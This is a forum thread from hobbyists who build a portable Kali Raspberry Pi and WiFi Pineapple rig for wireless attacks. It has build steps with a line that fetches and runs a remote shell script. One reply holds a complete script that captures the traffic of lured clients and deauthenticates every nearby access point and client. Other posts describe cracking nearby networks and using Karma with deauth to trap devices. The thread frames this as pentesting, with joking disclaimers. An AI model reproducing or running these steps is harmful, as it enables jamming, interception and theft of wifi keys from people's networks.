Jump to content

Pineapple Kali Pi


Guest desarmy

Recommended Posts

Guest desarmy

UPDATE: 4/16

I already had a usb rubby ducky and thanks to the Kali-Linux install script of the Rubber Ducky Payload Generator this device now has a new attack vector granted I have access to a client station. Thanks Hak5!

UPDATE:

I am now running kali linux on raspberry pi

I am now going to automate as much as i can :wub:

To use the setup I use a tablet and vnc into it

It takes about 3 minutes to power up everything, ssh into pi, startvnc and login

Screenshot_2013-03-13-18-07-45.png

I hooked up the AWUS036NHA to the kali pi and did a real world wifi cracking test (wifite is built into kali)

I found a good spot with multiple networks and the signal strength isnt great, It took around 5 min

Screenshot_2013-03-14.png

This whole getup is very easy to setup, I will actually be able to use this within 6 months on a clients network.

.P3180925.jpg

This is what it all looks like all parts cost around $350

Step 1 buy stuff: Buy raspberry pi, wifipineapple, 2 alfas, usb hub, 8gb usb drive, 16gb sdcard, ethernet cable

Step 2 setup pi: http://cdimage.kali.org/kali-images/kali-linux-1.0-armel-raspberrypi.img.gz Dowload and write to sdcard put in pi thats it.

Step 3 setup pineapple: http://forums.hak5.org/index.php?/forum/65-mark-iv/

Step 4 power them up: Plug the KaliPi into the pineapple poe jack. KaliPi automatically tries to connect on eth0,

Step 5 My pi is always assigned the address 172.16.42.157. SSH in to kalipi (pw:toor) install tightvncserver.

Step 6 Install raspi-config on Kali pi

git clone http://github.com/asb/raspi-config.git

cd raspi-config
sh raspi-config
Step 7: Use what the gods gave you
wget wifipineapple.com/wp4.sh
chmod+x wp4.sh
./wp4.sh
If you have questions... pm me!

I am a computer science student and just a nerd that likes to play with things

This is my first post. I recently got a raspberry pi and a wifi pineapple mark iv and set them up to work together. I just got a new battery pack (anker astro3 10000mAh) and it runs the two of them, it will run for close to 5 hours as pictured. I also use them with the Alfa AWUS036H (not pictured) and the AWUS036NHA. It took a little time but was not that hard. Raspberry pi instructions, Pwnpi and http://forums.hak5.org/index.php?/forum/49-jasager/ I will update as the project gets better, for now...

project.png

With the raspberry pi you can make any tv or monitor your display with rca or hdmi. Or ssh and vnc into both devices from you laptop, tablet, or phone

PC300388.JPG

I am working on complete automation based off the fact that Karma will bring devices to the network, and the pwnpi will attack most hosts on the pineapple network

Making it mobile, I thought about a pizza box but figured a solar backpack was a better bet

In this pic i am using the pineapple with the Alfa AWUS036H and AWUS036NHA.

P1140047.JPG

I decided to use 2 power supplies: anker astro3 10000mAh to run the pineapple and an anker 8400mAh to run the pi

P1070046.JPG

Edited by desarmy
Link to comment
Share on other sites

Heres a script I wrote up for my old mark3 for automated pineappling when connected to a backtrack5 laptop. It will require some modification to work with your setup, but it might be a good way to learn :) Hope you can get some value from it. Cheers

#!/bin/sh
#telot presents....:::drum roll:::
#One wicked ass nasty script that automates the ICS for the pineapple, begins packet capturing, and deauths every access point/client nearby! Enjoy!
#Note that this script makes quite a few assumptions. They are:
#You are using backtrack5R1.
#Your interface that is connecting to the internet is wlan0
#Your interface that is connecting to the pineapple is eth0
#You have a alfa realtek usb card capable of monitor mode plugged in.
#You have airdrop-ng installed and configured. This is a bit of a pita. If you don't want the deauth functions, comment it out (its at the very bottom of this script).
#You have not run wp3.sh or any other network configuration stuff.
#You have your pineapple configured to autostart karma at bootup.
#This script is meant to run on your laptop upon bootup.
#Also in this script, I'm using my smartphone's wifi hotspot feature, and that is why I'm using wpa_supplicant.
#So the internet I'm serving up in my pentest lab is actually run through my cellphone.
#So if you're dumb enough to do this in public to real people, use the local wifi. You don't want "real" targets eating up your monthly cellphone bandwidth.
#Disclaimer: Herp a derp don't use this in public. Don't use this on anyone but your wife. Don't invade other peoples privacy. Don't be an asshole. With great power comes great...blah blah blah
#I'm keeping most configuration and capture files on the desktop for ease.
cd /root/Desktop/
#Again, I'm using wpa because I'm running this through my cellphones hotspot. Remove the wpa_supplicant line and replace it with the below commented line.
#iwconfig wlan0 essid EssidOfAPyouWantToUse
wpa_supplicant -B Dwext -i wlan0 -c Jack.conf
dhclient wlan0
#Now I just copy pasta'd most of this from the wp3.sh - I use all defaults for my setup, if you do not, change as necessary.
#Bring up Ethernet Interface directly connected to Pineapple
ifconfig eth0 172.16.42.42 netmask 255.255.255.0 up
# Enable IP Forwarding
echo '1' > /proc/sys/net/ipv4/ip_forward
echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "
cat /proc/sys/net/ipv4/ip_forward
#clear chains and rules
iptables -X
iptables -F
echo iptables chains and rules cleared
#setup IP forwarding
iptables -A FORWARD -i wlan0 -o wlan0 -s 172.16.42.0/24 -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
echo IP Forwarding Enabled
#remove default route
route del default
echo Default route removed
#add default gateway
route add default gw 192.168.1.1 wlan0
echo Pineapple Default Gateway Configured
#instructions
#echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan
ping -c3 172.16.42.1
if [ $? -eq 0 ]; then
echo "ICS configuration successful."
#echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"
#echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"
#echo "Enter Pineapple password if prompted"
#ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'
fi
echo ""
echo "Browse to http://172.16.42.1/pineapple -- Happy Hacking!"
echo ""
#Now on to the fun stuff!
#
#
#
#Now we autostart wireshark and begin capturing the pineapple traffic. I use screen -d -m to hide the console, as for some reason my wireshark is bugged out and hangs a bit.
#Remember to screen -r back to it and get rid of it when you're done.
screen -d -m wireshark -i eth0 -k -w sharkcap &
#This next section requires an additional wifi card that supports monitor mode. I have a usb alfa realtek one (similar to those found in the hakshop).
#This is also created in a detached screen. So remember to cleanup when you're done!
#
#
#Now we deauth every access point around us. Make sure to set a conf file (in my case, I call if yourescrewed.conf) for airdrop with your allows and denys.
#I set mine to allow the pineapple & my hotspot and deny everyone else.
ifconfig wlan1 up
airmon-ng start wlan1
cd /pentest/wireless/airdrop-ng/
screen -d -m airodump-ng mon0 -w capfile --output-format csv
sleep 20
python airdrop-ng -i mon0 -t capfile-01.csv -r yourescrewed.conf

telot
Edited by telot
Link to comment
Share on other sites

  • 1 month later...
  • 2 weeks later...

Never having actually used a pineapple I'm working on the assumption that there is a web gui for carrying out attacks as well as backend scripts for automation. That being said, i'm curious as to whether code from jasager responsible for the above could be borrowed and implemented in pwnpi for instance. Also, for a drop box easy use and automation through scripts/web ui is critical for fast deployment. Curious what peoples thoughts are here but it seems that with a rpi, two alphas, usb hub and power source you can create a far more powerfull and flexible pineapple and even a pwn plug for that matter. The possibilities seem wide open.

Link to comment
Share on other sites

I've been tinkering around with my Pi and pineapple recently too. It would seem the possibilities are somewhat endless. I also prefer using good ol' wheezy instead of PwnPi, in my experience PwnPi has too many issues as its still in beta and has yet to work out many a kink. Wheezy, with the right packages installed, is much more stable and if you remove some of the dead weight (with pen-testing in mind) and boot with a UHS Class 1 SD card then you can speed up your pwnage significantly. imho.

Link to comment
Share on other sites

  • 2 weeks later...

I've been tinkering around with my Pi and pineapple recently too. It would seem the possibilities are somewhat endless. I also prefer using good ol' wheezy instead of PwnPi, in my experience PwnPi has too many issues as its still in beta and has yet to work out many a kink. Wheezy, with the right packages installed, is much more stable and if you remove some of the dead weight (with pen-testing in mind) and boot with a UHS Class 1 SD card then you can speed up your pwnage significantly. imho.

Checkout Kali for Raspberry Pi icedevil433. Its a lot more solid than pwnpi for some things. Plus apt-get'ting all those tools on a fresh rasbian install would be extremely painful...apt-get just takes forever on the pi!

telot

Link to comment
Share on other sites

Guest desarmy

I'd recommend over clocking it to 800Mhz though

:)

Thanks, i tried and it was not apparent. raspi-config is not installed on the kali pi image. I was able to clone it from github and then run it and set the overclock to 800Mhz :lol:

Edited by desarmy
Link to comment
Share on other sites

Yep - the raspi-config is also oh-so-necessary for easily expanding the root fs to utilize your entire SD card

telot

Link to comment
Share on other sites

OMG I am soooo jealous OP, but thanks for the hacker porn!!!!!

Want to sell me one for a secondhand price loaded with Kali? If so PM me an offer. Btw I heard that the first production run of Rasberry Pi had a lot of glitches -- are they worked out now and what generation/version are you on?

Edited by whitehat
Link to comment
Share on other sites

Guest desarmy

OMG I am soooo jealous OP, but thanks for the hacker porn!!!!!

Want to sell me one for a secondhand price loaded with Kali? If so PM me an offer. Btw I heard that the first production run of Rasberry Pi had a lot of glitches -- are they worked out now and what generation/version are you on?

I am using raspberry pi v2

Link to comment
Share on other sites

Guest desarmy

Okay, quick question, how do you get the vnc client to actually show anything? I can vnc in, but just get a gray screen and a mouse pointer.

Wait!! Reboot fixed it!!

Are you having fun now?

Link to comment
Share on other sites

Guest desarmy

It's a little slow....

True, my next version will be with the odroid-u2. To do it right with a 16GB eMMC Module and accessories is around $200

Edited by desarmy
Link to comment
Share on other sites

What if you disconnect the ALFA that is connected via USB to the Raspberry Pi but the Ethernet cable was connect to a WiFi Pineapple Elite, would the WiFi Pineapple Elite still work as a wireless adapter? Or would I still need the ALFA that is just plugged into the Raspberry Pi?

Edited by SydroticKemix
Link to comment
Share on other sites

Guest desarmy

What if you disconnect the ALFA that is connected via USB to the Raspberry Pi but the Ethernet cable was connect to a WiFi Pineapple Elite, would the WiFi Pineapple Elite still work as a wireless adapter? Or would I still need the ALFA that is just plugged into the Raspberry Pi?

I use the ALFA with the raspberry pi to deauth clients/crack wifi keys, you dont need it.

Link to comment
Share on other sites

Guest desarmy

1. What does deauthing do?

2. So your saying if I don't need the standalone ALFA, that the WiFi Pineapple Elite will act as a WiFi adapter?

1.

http://hackaday.com/2011/10/04/wifi-jamming-via-deauthentication-packets/

The best way to use the wifipineapple is to run karma, and deauth clients on target network till the clients send out probes, which get answered by the pineapple. The mark iv now does this (i think)

2. It depends, if you want to do a wifi relay you need an alfa to connect to the pineapple, if you are using usb tethering you dont need it. Read the book

https://www.dropbox.com/s/dr6sedfteu8atwq/hak5-mk4-book1e.pdf

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...